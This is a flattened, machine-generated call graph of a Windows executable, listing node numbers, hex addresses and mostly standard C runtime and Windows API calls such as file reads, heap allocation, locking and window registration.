411afc 6 API calls __decode_pointer 83299->83313 83302->83293 83305 41841c 83304->83305 83306 41842f EnterCriticalSection 83304->83306 83314 418344 83305->83314 83306->83299 83308 418422 83308->83306 83342 4117af 67 API calls 3 library calls 83308->83342 83310 41842e 83310->83306 83311->83299 83312->83299 83313->83299 83315 418350 _fseek 83314->83315 83316 418360 83315->83316 83317 418378 83315->83317 83343 418252 67 API calls 2 library calls 83316->83343 83326 418386 _fseek 83317->83326 83346 416fb6 83317->83346 83320 418365 83344 4180a7 67 API calls 7 library calls 83320->83344 83323 41836c 83345 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83323->83345 83324 4183a7 83329 418407 __lock 67 API calls 83324->83329 83325 418398 83352 417f23 67 API calls __getptd_noexit 83325->83352 83326->83308 83331 4183ae 83329->83331 83332 4183e2 83331->83332 83333 4183b6 83331->83333 83334 413a88 __getptd_noexit 67 API calls 83332->83334 83353 4189e6 InitializeCriticalSectionAndSpinCount _fseek 83333->83353 83341 4183d3 83334->83341 83336 4183c1 83336->83341 83354 413a88 83336->83354 83339 4183cd 83367 417f23 67 API calls __getptd_noexit 83339->83367 83368 4183fe LeaveCriticalSection _doexit 83341->83368 83342->83310 83343->83320 83344->83323 83349 416fbf 83346->83349 83348 416ff5 83348->83324 83348->83325 83349->83348 83350 416fd6 Sleep 83349->83350 83369 4138ba 83349->83369 83351 416feb 83350->83351 83351->83348 83351->83349 83352->83326 83353->83336 83355 413a94 _fseek 83354->83355 83356 413b0d __dosmaperr _fseek 83355->83356 83357 418407 __lock 65 API calls 83355->83357 83366 413ad3 83355->83366 83356->83339 83363 413aab ___sbh_find_block 83357->83363 83358 413ae8 RtlFreeHeap 83358->83356 83359 413afa 83358->83359 83398 417f23 67 API calls __getptd_noexit 83359->83398 83361 413aff GetLastError 83361->83356 83362 413ac5 83397 413ade LeaveCriticalSection _doexit 83362->83397 83363->83362 83396 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __cftoe2_l 83363->83396 83366->83356 83366->83358 83367->83341 83368->83326 83370 41396d 83369->83370 83381 4138cc 83369->83381 83394 411afc 6 API calls __decode_pointer 83370->83394 83372 413973 83395 417f23 67 API calls __getptd_noexit 83372->83395 83375 413965 83375->83349 83378 413929 RtlAllocateHeap 83378->83381 83379 4138dd 83379->83381 83387 418252 67 API calls 2 library calls 83379->83387 83388 4180a7 67 API calls 7 library calls 83379->83388 83389 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83379->83389 83381->83375 83381->83378 83381->83379 83382 413959 83381->83382 83385 41395e 83381->83385 83390 41386b 67 API calls 4 library calls 83381->83390 83391 411afc 6 API calls __decode_pointer 83381->83391 83392 417f23 67 API calls __getptd_noexit 83382->83392 83393 417f23 67 API calls __getptd_noexit 83385->83393 83387->83379 83388->83379 83390->83381 83391->83381 83392->83385 83393->83375 83394->83372 83395->83375 83396->83362 83397->83366 83398->83361 83399->83183 83400->83192 83401->83191 83402->83214 83403->83217 83405 41848c 83404->83405 83406 41696e __encode_pointer 6 API calls 83405->83406 83407 4184a4 83405->83407 83406->83405 83407->83222 83411 4113e5 83408->83411 83410 41142e 83410->83224 83412 4113f1 _fseek 83411->83412 83419 41181b 83412->83419 83418 411412 _fseek 83418->83410 83420 418407 __lock 67 API calls 83419->83420 83421 4113f6 83420->83421 83422 4112fa 83421->83422 83423 4169e9 __decode_pointer 6 API calls 83422->83423 83424 41130e 83423->83424 83425 4169e9 __decode_pointer 6 API calls 83424->83425 83426 41131e 83425->83426 83427 4113a1 83426->83427 83445 4170e7 68 API calls 5 library calls 83426->83445 83442 41141b 83427->83442 83429 41133c 83430 411388 83429->83430 83433 411357 83429->83433 83434 411366 83429->83434 83431 41696e __encode_pointer 6 API calls 83430->83431 83432 411396 83431->83432 83435 41696e __encode_pointer 6 API calls 83432->83435 83446 417047 73 API calls _realloc 83433->83446 83434->83427 83437 411360 83434->83437 83435->83427 83437->83434 83440 41137c 83437->83440 83447 417047 73 API calls _realloc 83437->83447 83439 411376 83439->83427 83439->83440 83441 41696e __encode_pointer 6 API calls 83440->83441 83441->83430 83448 411824 83442->83448 83445->83429 83446->83437 83447->83439 83451 41832d LeaveCriticalSection 83448->83451 83450 411420 83450->83418 83451->83450 83453 4092c8 ctype 83452->83453 83454 429db0 VariantClear 83453->83454 83455 4092d5 ctype 83453->83455 83454->83455 83455->83229 83500 40eb70 83456->83500 83459->83235 83460->83237 83461->83239 83504 401f80 83462->83504 83464 40d6f1 IsDebuggerPresent 83465 431a9d MessageBoxA 83464->83465 83466 40d6ff 83464->83466 83467 431ab6 83465->83467 83466->83467 83468 40d71f 83466->83468 83597 403e90 75 API calls 3 library calls 83467->83597 83574 40f3b0 83468->83574 83472 40d73a GetFullPathNameW 83594 401440 127 API calls _wcscat 83472->83594 83474 40d77a 83475 40d782 83474->83475 83476 431b09 SetCurrentDirectoryW 83474->83476 83477 40d78b 83475->83477 83598 43604b 6 API calls 83475->83598 83476->83475 83586 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 83477->83586 83480 431b28 83480->83477 83482 431b30 GetModuleFileNameW 83480->83482 83484 431ba4 GetForegroundWindow ShellExecuteW 83482->83484 83485 431b4c 83482->83485 83487 40d7c7 83484->83487 83599 401b70 75 API calls 2 library calls 83485->83599 83486 40d795 83493 40d7a8 83486->83493 83595 40e1e0 97 API calls _memset 83486->83595 83491 40d7d1 SetCurrentDirectoryW 83487->83491 83490 431b5a 83600 40d3b0 75 API calls 2 library calls 83490->83600 83491->83241 83493->83487 83596 401000 Shell_NotifyIconW _memset 83493->83596 83494 431b66 83601 40d3b0 75 API calls 2 library calls 83494->83601 83497 431b72 GetForegroundWindow ShellExecuteW 83498 431b9f 83497->83498 83498->83487 83499 40eba0 LoadLibraryA GetProcAddress 83499->83232 83501 40d86e 83500->83501 83502 40eb76 LoadLibraryA 83500->83502 83501->83232 83501->83499 83502->83501 83503 40eb87 GetProcAddress 83502->83503 83503->83501 83602 40e680 75 API calls 83504->83602 83506 401f90 83603 402940 75 API calls __write_nolock 83506->83603 83508 401fa2 GetModuleFileNameW 83604 40ff90 83508->83604 83510 401fbd 83616 4107b0 75 API calls 83510->83616 83512 401fd6 83617 401b70 75 API calls 2 library calls 83512->83617 83514 401fe4 83618 4019e0 76 API calls 83514->83618 83516 401ff2 83517 4092c0 VariantClear 83516->83517 83518 402002 83517->83518 83619 401b70 75 API calls 2 library calls 83518->83619 83520 40201c 83620 4019e0 76 API calls 83520->83620 83522 40202c 83621 401b70 75 API calls 2 library calls 83522->83621 83524 40203c 83622 40c3e0 75 API calls 83524->83622 83526 40204d 83623 40c060 83526->83623 83530 40206e 83629 4115d0 79 API calls 2 library calls 83530->83629 83532 40207d 83533 42c174 83532->83533 83534 402088 83532->83534 83640 401a70 75 API calls 83533->83640 83630 4115d0 79 API calls 2 library calls 83534->83630 83537 42c189 83641 401a70 75 API calls 83537->83641 83538 402093 83538->83537 83539 40209e 83538->83539 83631 4115d0 79 API calls 2 library calls 83539->83631 83542 42c1a7 83544 42c1b0 GetModuleFileNameW 83542->83544 83543 4020a9 83543->83544 83545 4020b4 83543->83545 83642 401a70 75 API calls 83544->83642 83632 4115d0 79 API calls 2 library calls 83545->83632 83548 4020bf 83550 402107 83548->83550 83553 42c20a _wcscpy 83548->83553 83633 401a70 75 API calls 83548->83633 83549 42c1e2 83643 40df50 75 API calls 83549->83643 83552 402119 83550->83552 83550->83553 83555 42c243 83552->83555 83635 40e7e0 76 API calls 83552->83635 83645 401a70 75 API calls 83553->83645 83554 42c1f1 83644 401a70 75 API calls 83554->83644 83559 4020e5 _wcscpy 83634 401a70 75 API calls 83559->83634 83560 42c201 83560->83553 83562 402132 83636 40d030 76 API calls 83562->83636 83564 40213e 83566 4092c0 VariantClear 83564->83566 83569 402148 83566->83569 83567 402184 83571 4092c0 VariantClear 83567->83571 83569->83567 83637 40d030 76 API calls 83569->83637 83638 40e640 76 API calls 83569->83638 83639 401a70 75 API calls 83569->83639 83573 402196 ctype 83571->83573 83573->83464 83575 42ccf4 _memset 83574->83575 83576 40f3c9 83574->83576 83579 42cd05 GetOpenFileNameW 83575->83579 84321 40ffb0 76 API calls ctype 83576->84321 83578 40f3d2 84322 410130 SHGetMalloc 83578->84322 83579->83576 83581 40d732 83579->83581 83581->83472 83581->83474 83582 40f3d9 84327 410020 88 API calls __wcsicoll 83582->84327 83584 40f3e7 84328 40f400 83584->84328 83587 42b9d3 83586->83587 83588 41025a LoadImageW RegisterClassExW 83586->83588 84375 443e8f EnumResourceNamesW LoadImageW 83587->84375 84374 4102f0 7 API calls 83588->84374 83591 40d790 83593 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 83591->83593 83592 42b9da 83593->83486 83594->83474 83595->83493 83596->83487 83597->83474 83598->83480 83599->83490 83600->83494 83601->83497 83602->83506 83603->83508 83646 40f5e0 83604->83646 83607 40ffa6 83607->83510 83609 42b6d8 83610 42b6e6 83609->83610 83702 434fe1 83609->83702 83611 413a88 __getptd_noexit 67 API calls 83610->83611 83613 42b6f5 83611->83613 83614 434fe1 106 API calls 83613->83614 83615 42b702 83614->83615 83615->83510 83616->83512 83617->83514 83618->83516 83619->83520 83620->83522 83621->83524 83622->83526 83624 41171a 75 API calls 83623->83624 83625 40c088 83624->83625 83626 41171a 75 API calls 83625->83626 83627 402061 83626->83627 83628 401a70 75 API calls 83627->83628 83628->83530 83629->83532 83630->83538 83631->83543 83632->83548 83633->83559 83634->83550 83635->83562 83636->83564 83637->83569 83638->83569 83639->83569 83640->83537 83641->83542 83642->83549 83643->83554 83644->83560 83645->83569 83706 40f580 83646->83706 83648 40f5f8 _strcat ctype 83714 40f6d0 83648->83714 83653 42b2ee 83743 4151b0 83653->83743 83655 40f679 83655->83653 83657 40f681 83655->83657 83730 414e94 83657->83730 83661 40f68b 83661->83607 83665 452574 83661->83665 83662 42b31d 83749 415484 83662->83749 83664 42b33d 83666 41557c _fseek 105 API calls 83665->83666 83667 4525df 83666->83667 84266 4523ce 83667->84266 83670 4525fc 83670->83609 83671 4151b0 __fread_nolock 81 API calls 83672 45261d 83671->83672 83673 4151b0 __fread_nolock 81 API calls 83672->83673 83674 45262e 83673->83674 83675 4151b0 __fread_nolock 81 API calls 83674->83675 83676 452649 83675->83676 83677 4151b0 __fread_nolock 81 API calls 83676->83677 83678 452666 83677->83678 83679 41557c _fseek 105 API calls 83678->83679 83680 452682 83679->83680 83681 4138ba _malloc 67 API calls 83680->83681 83682 45268e 83681->83682 83683 4138ba _malloc 67 API calls 83682->83683 83684 45269b 83683->83684 83685 4151b0 __fread_nolock 81 API calls 83684->83685 83686 4526ac 83685->83686 83687 44afdc GetSystemTimeAsFileTime 83686->83687 83688 4526bf 83687->83688 83689 4526d5 83688->83689 83690 4526fd 83688->83690 83691 413a88 __getptd_noexit 67 API calls 83689->83691 83692 452704 83690->83692 83693 45275b 83690->83693 83694 4526df 83691->83694 84272 44b195 83692->84272 83696 413a88 __getptd_noexit 67 API calls 83693->83696 83697 413a88 __getptd_noexit 67 API calls 83694->83697 83699 452759 83696->83699 83700 4526e8 83697->83700 83698 452753 83701 413a88 __getptd_noexit 67 API calls 83698->83701 83699->83609 83700->83609 83701->83699 83703 434ff1 83702->83703 83704 434feb 83702->83704 83703->83610 83705 414e94 __fcloseall 106 API calls 83704->83705 83705->83703 83707 429440 83706->83707 83708 40f589 _wcslen 83706->83708 83709 40f58f WideCharToMultiByte 83708->83709 83710 40f5d8 83709->83710 83711 40f5ad 83709->83711 83710->83648 83762 41171a 83711->83762 83715 40f6dd _strlen 83714->83715 83777 40f790 83715->83777 83718 414e06 83797 414d40 83718->83797 83720 40f666 83720->83653 83721 40f450 83720->83721 83725 40f45a _strcat _memcpy_s __write_nolock 83721->83725 83722 4151b0 __fread_nolock 81 API calls 83722->83725 83724 42936d 83726 41557c _fseek 105 API calls 83724->83726 83725->83722 83725->83724 83729 40f531 83725->83729 83880 41557c 83725->83880 83727 429394 83726->83727 83728 4151b0 __fread_nolock 81 API calls 83727->83728 83728->83729 83729->83655 83731 414ea0 _fseek 83730->83731 83732 414ed1 83731->83732 83733 414eb4 83731->83733 83736 415965 __lock_file 68 API calls 83732->83736 83740 414ec9 _fseek 83732->83740 84019 417f23 67 API calls __getptd_noexit 83733->84019 83735 414eb9 84020 417ebb 6 API calls 2 library calls 83735->84020 83738 414ee9 83736->83738 84003 414e1d 83738->84003 83740->83661 84088 41511a 83743->84088 83745 4151c8 83746 44afdc 83745->83746 84259 4431e0 83746->84259 83748 44affd 83748->83662 83750 415490 _fseek 83749->83750 83751 4154bb 83750->83751 83752 41549e 83750->83752 83754 415965 __lock_file 68 API calls 83751->83754 84263 417f23 67 API calls __getptd_noexit 83752->84263 83755 4154c3 83754->83755 83757 4152e7 __ftell_nolock 71 API calls 83755->83757 83756 4154a3 84264 417ebb 6 API calls 2 library calls 83756->84264 83759 4154cf 83757->83759 84265 4154e8 LeaveCriticalSection LeaveCriticalSection __wfsopen 83759->84265 83761 4154b3 _fseek 83761->83664 83764 411724 83762->83764 83763 4138ba _malloc 67 API calls 83763->83764 83764->83763 83765 40f5bb WideCharToMultiByte 83764->83765 83767 411740 std::bad_alloc::bad_alloc 83764->83767 83774 411afc 6 API calls __decode_pointer 83764->83774 83765->83648 83770 411421 __cinit 74 API calls 83767->83770 83772 411766 83767->83772 83769 411770 83776 41805b RaiseException 83769->83776 83770->83772 83775 4116fd 67 API calls std::exception::exception 83772->83775 83773 41177e 83774->83764 83775->83769 83776->83773 83779 40f7ae _memset 83777->83779 83778 42a349 83779->83778 83781 40f628 83779->83781 83782 415258 83779->83782 83781->83718 83783 415285 83782->83783 83784 415268 83782->83784 83783->83784 83786 41528c 83783->83786 83793 417f23 67 API calls __getptd_noexit 83784->83793 83795 41c551 103 API calls 14 library calls 83786->83795 83787 41526d 83794 417ebb 6 API calls 2 library calls 83787->83794 83790 4152b2 83791 41527d 83790->83791 83796 4191c9 101 API calls 6 library calls 83790->83796 83791->83779 83793->83787 83795->83790 83796->83791 83798 414d4c _fseek 83797->83798 83799 414d5f 83798->83799 83802 414d95 83798->83802 83849 417f23 67 API calls __getptd_noexit 83799->83849 83801 414d64 83850 417ebb 6 API calls 2 library calls 83801->83850 83816 41e28c 83802->83816 83805 414d74 _fseek @_EH4_CallFilterFunc@8 83805->83720 83806 414d9a 83807 414da1 83806->83807 83808 414dae 83806->83808 83851 417f23 67 API calls __getptd_noexit 83807->83851 83809 414dd6 83808->83809 83810 414db6 83808->83810 83834 41dfd8 83809->83834 83852 417f23 67 API calls __getptd_noexit 83810->83852 83817 41e298 _fseek 83816->83817 83818 418407 __lock 67 API calls 83817->83818 83820 41e2a6 83818->83820 83819 41e322 83822 416fb6 __malloc_crt 67 API calls 83819->83822 83820->83819 83826 418344 __mtinitlocknum 67 API calls 83820->83826 83829 41e31b 83820->83829 83857 4159a6 68 API calls __lock 83820->83857 83858 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 83820->83858 83824 41e32c 83822->83824 83823 41e3b0 _fseek 83823->83806 83824->83829 83859 4189e6 InitializeCriticalSectionAndSpinCount _fseek 83824->83859 83826->83820 83828 41e351 83830 41e35c 83828->83830 83831 41e36f EnterCriticalSection 83828->83831 83854 41e3bb 83829->83854 83833 413a88 __getptd_noexit 67 API calls 83830->83833 83831->83829 83833->83829 83835 41dffb __wopenfile 83834->83835 83836 41e015 83835->83836 83848 41e1e9 83835->83848 83866 4136bc 79 API calls 2 library calls 83835->83866 83864 417f23 67 API calls __getptd_noexit 83836->83864 83838 41e01a 83865 417ebb 6 API calls 2 library calls 83838->83865 83840 41e247 83861 425db0 83840->83861 83844 41e1e2 83844->83848 83867 4136bc 79 API calls 2 library calls 83844->83867 83846 41e201 83846->83848 83868 4136bc 79 API calls 2 library calls 83846->83868 83848->83836 83848->83840 83849->83801 83851->83805 83852->83805 83853 414dfc LeaveCriticalSection LeaveCriticalSection __wfsopen 83853->83805 83860 41832d LeaveCriticalSection 83854->83860 83856 41e3c2 83856->83823 83857->83820 83858->83820 83859->83828 83860->83856 83869 425ce4 83861->83869 83863 414de1 83863->83853 83864->83838 83866->83844 83867->83846 83868->83848 83870 425cf0 _fseek 83869->83870 83871 425d03 83870->83871 83874 425d41 83870->83874 83872 417f23 _memcpy_s 67 API calls 83871->83872 83873 425d08 83872->83873 83875 417ebb _memcpy_s 6 API calls 83873->83875 83876 4255c4 __tsopen_nolock 132 API calls 83874->83876 83879 425d17 _fseek 83875->83879 83877 425d5b 83876->83877 83878 425d82 __sopen_helper LeaveCriticalSection 83877->83878 83878->83879 83879->83863 83884 415588 _fseek 83880->83884 83881 415596 83911 417f23 67 API calls __getptd_noexit 83881->83911 83883 4155c4 83893 415965 83883->83893 83884->83881 83884->83883 83885 41559b 83912 417ebb 6 API calls 2 library calls 83885->83912 83892 4155ab _fseek 83892->83725 83894 415977 83893->83894 83895 415999 EnterCriticalSection 83893->83895 83894->83895 83896 41597f 83894->83896 83898 4155cc 83895->83898 83897 418407 __lock 67 API calls 83896->83897 83897->83898 83899 4154f2 83898->83899 83900 415512 83899->83900 83901 415502 83899->83901 83902 415524 83900->83902 83914 4152e7 83900->83914 83968 417f23 67 API calls __getptd_noexit 83901->83968 83931 41486c 83902->83931 83904 415507 83913 4155f7 LeaveCriticalSection LeaveCriticalSection __wfsopen 83904->83913 83911->83885 83913->83892 83915 41531a 83914->83915 83916 4152fa 83914->83916 83918 41453a __fileno 67 API calls 83915->83918 83969 417f23 67 API calls __getptd_noexit 83916->83969 83920 415320 83918->83920 83919 4152ff 83970 417ebb 6 API calls 2 library calls 83919->83970 83922 41efd4 __locking 71 API calls 83920->83922 83923 415335 83922->83923 83924 415364 83923->83924 83925 4153a9 83923->83925 83930 41530f 83923->83930 83927 41efd4 __locking 71 API calls 83924->83927 83924->83930 83971 417f23 67 API calls __getptd_noexit 83925->83971 83928 415404 83927->83928 83929 41efd4 __locking 71 API calls 83928->83929 83928->83930 83929->83930 83930->83902 83932 4148a7 83931->83932 83933 414885 83931->83933 83937 41453a 83932->83937 83933->83932 83934 41453a __fileno 67 API calls 83933->83934 83935 4148a0 83934->83935 83972 41c3cf 101 API calls 6 library calls 83935->83972 83938 41455e 83937->83938 83939 414549 83937->83939 83943 41efd4 83938->83943 83973 417f23 67 API calls __getptd_noexit 83939->83973 83941 41454e 83974 417ebb 6 API calls 2 library calls 83941->83974 83944 41efe0 _fseek 83943->83944 83945 41f003 83944->83945 83946 41efe8 83944->83946 83948 41f011 83945->83948 83951 41f052 83945->83951 83995 417f36 67 API calls __getptd_noexit 83946->83995 83997 417f36 67 API calls __getptd_noexit 83948->83997 83949 41efed 83996 417f23 67 API calls __getptd_noexit 83949->83996 83975 41ba3b 83951->83975 83953 41f016 83998 417f23 67 API calls __getptd_noexit 83953->83998 83956 41f01d 83999 417ebb 6 API calls 2 library calls 83956->83999 83957 41f058 83959 41f065 83957->83959 83960 41f07b 83957->83960 83985 41ef5f 83959->83985 84000 417f23 67 API calls __getptd_noexit 83960->84000 83961 41eff5 _fseek 83961->83904 83964 41f073 84002 41f0a6 LeaveCriticalSection __unlock_fhandle 83964->84002 83965 41f080 84001 417f36 67 API calls __getptd_noexit 83965->84001 83968->83904 83969->83919 83971->83930 83972->83932 83973->83941 83976 41ba47 _fseek 83975->83976 83977 41baa2 83976->83977 83980 418407 __lock 67 API calls 83976->83980 83978 41bac4 _fseek 83977->83978 83979 41baa7 EnterCriticalSection 83977->83979 83978->83957 83979->83978 83981 41ba73 83980->83981 83982 4189e6 ___lock_fhandle InitializeCriticalSectionAndSpinCount 83981->83982 83984 41ba8a 83981->83984 83982->83984 83983 41bad2 ___lock_fhandle LeaveCriticalSection 83983->83977 83984->83983 83986 41b9c4 __close_nolock 67 API calls 83985->83986 83987 41ef6e 83986->83987 83988 41ef84 SetFilePointer 83987->83988 83989 41ef74 83987->83989 83991 41ef9b GetLastError 83988->83991 83992 41efa3 83988->83992 83990 417f23 _memcpy_s 67 API calls 83989->83990 83993 41ef79 83990->83993 83991->83992 83992->83993 83994 417f49 __dosmaperr 67 API calls 83992->83994 83993->83964 83994->83993 83995->83949 83996->83961 83997->83953 83998->83956 84000->83965 84001->83964 84002->83961 84004 414e31 84003->84004 84005 414e4d 84003->84005 84049 417f23 67 API calls __getptd_noexit 84004->84049 84007 414e46 84005->84007 84009 41486c __flush 101 API calls 84005->84009 84021 414f08 LeaveCriticalSection LeaveCriticalSection __wfsopen 84007->84021 84008 414e36 84050 417ebb 6 API calls 2 library calls 84008->84050 84011 414e59 84009->84011 84022 41e680 84011->84022 84014 41453a __fileno 67 API calls 84015 414e67 84014->84015 84026 41e5b3 84015->84026 84017 414e6d 84017->84007 84018 413a88 __getptd_noexit 67 API calls 84017->84018 84018->84007 84019->83735 84021->83740 84023 41e690 84022->84023 84024 414e61 84022->84024 84023->84024 84025 413a88 __getptd_noexit 67 API calls 84023->84025 84024->84014 84025->84024 84027 41e5bf _fseek 84026->84027 84028 41e5e2 84027->84028 84029 41e5c7 84027->84029 84031 41e5f0 84028->84031 84036 41e631 84028->84036 84066 417f36 67 API calls __getptd_noexit 84029->84066 84068 417f36 67 API calls __getptd_noexit 84031->84068 84032 41e5cc 84067 417f23 67 API calls __getptd_noexit 84032->84067 84035 41e5f5 84069 417f23 67 API calls __getptd_noexit 84035->84069 84037 41ba3b ___lock_fhandle 68 API calls 84036->84037 84039 41e637 84037->84039 84041 41e652 84039->84041 84042 41e644 84039->84042 84040 41e5fc 84070 417ebb 6 API calls 2 library calls 84040->84070 84071 417f23 67 API calls __getptd_noexit 84041->84071 84051 41e517 84042->84051 84046 41e5d4 _fseek 84046->84017 84047 41e64c 84072 41e676 LeaveCriticalSection __unlock_fhandle 84047->84072 84049->84008 84073 41b9c4 84051->84073 84053 41e57d 84086 41b93e 68 API calls 2 library calls 84053->84086 84055 41e527 84055->84053 84058 41b9c4 __close_nolock 67 API calls 84055->84058 84065 41e55b 84055->84065 84056 41b9c4 __close_nolock 67 API calls 84059 41e567 CloseHandle 84056->84059 84057 41e585 84060 41e5a7 84057->84060 84087 417f49 67 API calls 3 library calls 84057->84087 84061 41e552 84058->84061 84059->84053 84063 41e573 GetLastError 84059->84063 84060->84047 84062 41b9c4 __close_nolock 67 API calls 84061->84062 84062->84065 84063->84053 84065->84053 84065->84056 84066->84032 84067->84046 84068->84035 84069->84040 84071->84047 84072->84046 84074 41b9d1 84073->84074 84075 41b9e9 84073->84075 84076 417f36 __free_osfhnd 67 API calls 84074->84076 84078 417f36 __free_osfhnd 67 API calls 84075->84078 84080 41ba2e 84075->84080 84077 41b9d6 84076->84077 84079 417f23 _memcpy_s 67 API calls 84077->84079 84081 41ba17 84078->84081 84082 41b9de 84079->84082 84080->84055 84083 417f23 _memcpy_s 67 API calls 84081->84083 84082->84055 84084 41ba1e 84083->84084 84085 417ebb _memcpy_s 6 API calls 84084->84085 84085->84080 84086->84057 84087->84060 84089 415126 _fseek 84088->84089 84090 41513a _memset 84089->84090 84091 41516f 84089->84091 84092 415164 _fseek 84089->84092 84117 417f23 67 API calls __getptd_noexit 84090->84117 84093 415965 __lock_file 68 API calls 84091->84093 84092->83745 84094 415177 84093->84094 84101 414f10 84094->84101 84097 415154 84118 417ebb 6 API calls 2 library calls 84097->84118 84102 414f4c 84101->84102 84105 414f2e _memset 84101->84105 84119 4151a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 84102->84119 84103 414f37 84170 417f23 67 API calls __getptd_noexit 84103->84170 84105->84102 84105->84103 84108 414f8b 84105->84108 84108->84102 84109 41453a __fileno 67 API calls 84108->84109 84113 4150a9 _memset 84108->84113 84116 4150d5 _memset 84108->84116 84120 41ed9e 84108->84120 84150 41e6b1 84108->84150 84172 41ee9b 67 API calls 2 library calls 84108->84172 84109->84108 84173 417f23 67 API calls __getptd_noexit 84113->84173 84115 414f3c 84171 417ebb 6 API calls 2 library calls 84115->84171 84174 417f23 67 API calls __getptd_noexit 84116->84174 84117->84097 84119->84092 84121 41edaa _fseek 84120->84121 84122 41edb2 84121->84122 84123 41edcd 84121->84123 84244 417f36 67 API calls __getptd_noexit 84122->84244 84124 41eddb 84123->84124 84130 41ee1c 84123->84130 84246 417f36 67 API calls __getptd_noexit 84124->84246 84126 41edb7 84245 417f23 67 API calls __getptd_noexit 84126->84245 84129 41ede0 84247 417f23 67 API calls __getptd_noexit 84129->84247 84131 41ee29 84130->84131 84132 41ee3d 84130->84132 84249 417f36 67 API calls __getptd_noexit 84131->84249 84135 41ba3b ___lock_fhandle 68 API calls 84132->84135 84138 41ee43 84135->84138 84136 41ede7 84248 417ebb 6 API calls 2 library calls 84136->84248 84137 41ee2e 84250 417f23 67 API calls __getptd_noexit 84137->84250 84141 41ee50 84138->84141 84142 41ee66 84138->84142 84140 41edbf _fseek 84140->84108 84175 41e7dc 84141->84175 84251 417f23 67 API calls __getptd_noexit 84142->84251 84146 41ee5e 84253 41ee91 LeaveCriticalSection __unlock_fhandle 84146->84253 84147 41ee6b 84252 417f36 67 API calls __getptd_noexit 84147->84252 84151 41e6c1 84150->84151 84155 41e6de 84150->84155 84257 417f23 67 API calls __getptd_noexit 84151->84257 84153 41e6c6 84258 417ebb 6 API calls 2 library calls 84153->84258 84156 41e713 84155->84156 84164 41e6d6 84155->84164 84254 423600 84155->84254 84158 41453a __fileno 67 API calls 84156->84158 84159 41e727 84158->84159 84160 41ed9e __read 79 API calls 84159->84160 84161 41e72e 84160->84161 84162 41453a __fileno 67 API calls 84161->84162 84161->84164 84163 41e751 84162->84163 84163->84164 84165 41453a __fileno 67 API calls 84163->84165 84164->84108 84166 41e75d 84165->84166 84166->84164 84167 41453a __fileno 67 API calls 84166->84167 84168 41e769 84167->84168 84169 41453a __fileno 67 API calls 84168->84169 84169->84164 84170->84115 84172->84108 84173->84115 84174->84115 84176 41e813 84175->84176 84177 41e7f8 84175->84177 84179 41e822 84176->84179 84181 41e849 84176->84181 84178 417f36 __free_osfhnd 67 API calls 84177->84178 84180 41e7fd 84178->84180 84182 417f36 __free_osfhnd 67 API calls 84179->84182 84184 417f23 _memcpy_s 67 API calls 84180->84184 84183 41e868 84181->84183 84198 41e87c 84181->84198 84185 41e827 84182->84185 84186 417f36 __free_osfhnd 67 API calls 84183->84186 84195 41e805 84184->84195 84188 417f23 _memcpy_s 67 API calls 84185->84188 84190 41e86d 84186->84190 84187 41e8d4 84189 417f36 __free_osfhnd 67 API calls 84187->84189 84191 41e82e 84188->84191 84192 41e8d9 84189->84192 84193 417f23 _memcpy_s 67 API calls 84190->84193 84194 417ebb _memcpy_s 6 API calls 84191->84194 84196 417f23 _memcpy_s 67 API calls 84192->84196 84197 41e874 84193->84197 84194->84195 84195->84146 84196->84197 84201 417ebb _memcpy_s 6 API calls 84197->84201 84198->84187 84198->84195 84199 41e8b0 84198->84199 84200 41e8f5 84198->84200 84199->84187 84206 41e8bb ReadFile 84199->84206 84203 416fb6 __malloc_crt 67 API calls 84200->84203 84201->84195 84207 41e90b 84203->84207 84204 41ed62 GetLastError 84208 41ebe8 84204->84208 84209 41ed6f 84204->84209 84205 41e9e7 84205->84204 84212 41e9fb 84205->84212 84206->84204 84206->84205 84210 41e931 84207->84210 84211 41e913 84207->84211 84216 417f49 __dosmaperr 67 API calls 84208->84216 84223 41eb6d 84208->84223 84214 417f23 _memcpy_s 67 API calls 84209->84214 84213 423462 __lseeki64_nolock 69 API calls 84210->84213 84215 417f23 _memcpy_s 67 API calls 84211->84215 84212->84223 84225 41ec2d 84212->84225 84226 41ea17 84212->84226 84218 41e93d 84213->84218 84219 41ed74 84214->84219 84217 41e918 84215->84217 84216->84223 84220 417f36 __free_osfhnd 67 API calls 84217->84220 84218->84206 84221 417f36 __free_osfhnd 67 API calls 84219->84221 84220->84195 84221->84223 84222 413a88 __getptd_noexit 67 API calls 84222->84195 84223->84195 84223->84222 84224 41eca5 ReadFile 84229 41ecc4 GetLastError 84224->84229 84237 41ecce 84224->84237 84225->84223 84225->84224 84227 41ea7d ReadFile 84226->84227 84232 41eafa 84226->84232 84228 41ea9b GetLastError 84227->84228 84236 41eaa5 84227->84236 84228->84226 84228->84236 84229->84225 84229->84237 84230 41ebbe MultiByteToWideChar 84230->84223 84231 41ebe2 GetLastError 84230->84231 84231->84208 84232->84223 84233 41eb75 84232->84233 84234 41eb68 84232->84234 84239 41eb32 84232->84239 84233->84239 84240 41ebac 84233->84240 84235 417f23 _memcpy_s 67 API calls 84234->84235 84235->84223 84236->84226 84241 423462 __lseeki64_nolock 69 API calls 84236->84241 84237->84225 84238 423462 __lseeki64_nolock 69 API calls 84237->84238 84238->84237 84239->84230 84242 423462 __lseeki64_nolock 69 API calls 84240->84242 84241->84236 84243 41ebbb 84242->84243 84243->84230 84244->84126 84245->84140 84246->84129 84247->84136 84249->84137 84250->84136 84251->84147 84252->84146 84253->84140 84255 416fb6 __malloc_crt 67 API calls 84254->84255 84256 423615 84255->84256 84256->84156 84257->84153 84262 414cef GetSystemTimeAsFileTime __aulldiv 84259->84262 84261 4431ef 84261->83748 84262->84261 84263->83756 84265->83761 84271 4523e1 _wcscpy 84266->84271 84267 44afdc GetSystemTimeAsFileTime 84267->84271 84268 4151b0 81 API calls __fread_nolock 84268->84271 84269 452553 84269->83670 84269->83671 84270 41557c 105 API calls _fseek 84270->84271 84271->84267 84271->84268 84271->84269 84271->84270 84273 44b1a6 84272->84273 84275 44b1b4 84272->84275 84274 414e06 138 API calls 84273->84274 84274->84275 84276 44b1ca 84275->84276 84277 414e06 138 API calls 84275->84277 84278 44b1c2 84275->84278 84307 4352d1 81 API calls 2 library calls 84276->84307 